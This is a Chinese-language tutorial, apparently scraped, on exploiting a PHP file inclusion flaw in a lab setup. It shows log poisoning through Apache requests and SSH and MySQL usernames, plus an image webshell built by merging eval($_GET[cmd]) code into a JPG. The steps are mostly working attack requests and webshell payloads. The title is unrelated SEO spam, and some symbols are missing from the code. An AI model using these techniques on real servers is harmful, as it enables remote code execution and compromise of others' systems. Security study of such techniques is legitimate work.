全国各城市感染高峰进度查询,宁波网站建设seo,提供图片做网站的要求,免费logo设计图案日志利用, 图片木马利用
一, 利用服务器日志
通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段.
apache log: /opt/lampp/logs/access_log
nginx log: /usr/local/nginx/logs/access.log 首先可以利用文件包含漏洞测试日志文件的内容是否可以显…日志利用, 图片木马利用
一, 利用服务器日志
通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段.
apache log: /opt/lampp/logs/access_log
nginx log: /usr/local/nginx/logs/access.log 首先可以利用文件包含漏洞测试日志文件的内容是否可以显示. 实际情况下日志的路径和名称都可能被修改, 需要其他手段获取.
http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/access_log
http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/error_log由于日志会记录请求的url, 如果发送的url中带有恶意代码, 那么日志文件access_log就会记录, 再使用文件包含漏洞包含日志文件来执行代码.
http://192.168.112.200/security/fileinc.php?php phpinfo(); ?查看access_log日志:
[25/Oct/2023:09:57:53 0800] GET /security/fileinc.php%3C?php%20phpinfo();%20?%3E HTTP/1.1这里可以看到符号被浏览器转码了, 因此无法执行代码. 那么我们绕过浏览器来发送这个请求, 例如使用 burpsuite.
方式1: 不使用双引号, 需要去掉php和空格.
GET /security/fileinc.php?phpinfo();? HTTP/1.1查看access_log日志:
[25/Oct/2023:10:26:31 0800] GET /security/fileinc.php?phpinfo();? HTTP/1.1 404 1033这里看到代码已经顺利写入了, 那么利用文件包含来执行代码:
http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/access_log方式2: 使用双引号, 好处是可以包含更复杂的代码.
GET /security/fileinc.php?php eval($_POST[cmd]);? HTTP/1.1查看access_log日志:
[25/Oct/2023:10:44:15 0800] GET /security/fileinc.php\?php eval($_POST[cmd]);?\ 400 961利用漏洞:
http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/access_logpost data:
cmdphpinfo();二, 利用ssh或mysql的登录日志
1. linux默认的登录日志:
/var/log/secure日志文件对其他用户有可读权限
正常登录:
ssh root192.168.112.200因为ssh的登录日志中会记录发送的用户名, 那么将用户名替换成恶意代码来登录:
ssh ?phpinfo();?192.168.112.200查看日志:
Oct 25 11:15:13 mycentos sshd[16208]: Invalid user ?phpinfo();? from 192.168.112.1 port 14605
Oct 25 11:15:13 mycentos sshd[16208]: input_userauth_request: invalid user ?phpinfo();? [preauth]这里可以看到代码已经注入到日志中了, 接下来利用文件包含漏洞执行代码:
http://192.168.112.200/security/fileinc.php?filename/var/log/secure2. mysql的登录日志
原理与ssh日志利用一样.
mysql日志默认是关闭的. 需要mysql日志是开启状态 /opt/lampp/etc/my.cnf:
general_logON
general_log_file/opt/lampp/logs/mysql.log
log_outputfile日志文件对其他用户有可读权限
假设日志的路径:
/opt/lampp/logs/mysql.log正常登录:
mysql -u root -p -h 192.168.112.200将用户名替换成恶意代码:
mysql -u ?phpinfo();? -p -h 192.168.112.200利用文件包含漏洞执行代码:
http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/mysql.log3. 图片木马
准备图片和php文件, 使用cmd中的copy命令合并.
例如: mm.php文件:
?php eval($_GET[cmd]); ?命令:
copy src.jpg/b mm.php/a p_mm.jpg以上命令将src.jpg与mm.php合并, 生成图片p_mm.jpg
将木马图片上传到服务器, 利用文件包含漏洞执行代码:
http://192.168.112.200/security/fileinc.php?filenameimage/p_mm.jpgcmdphpinfo();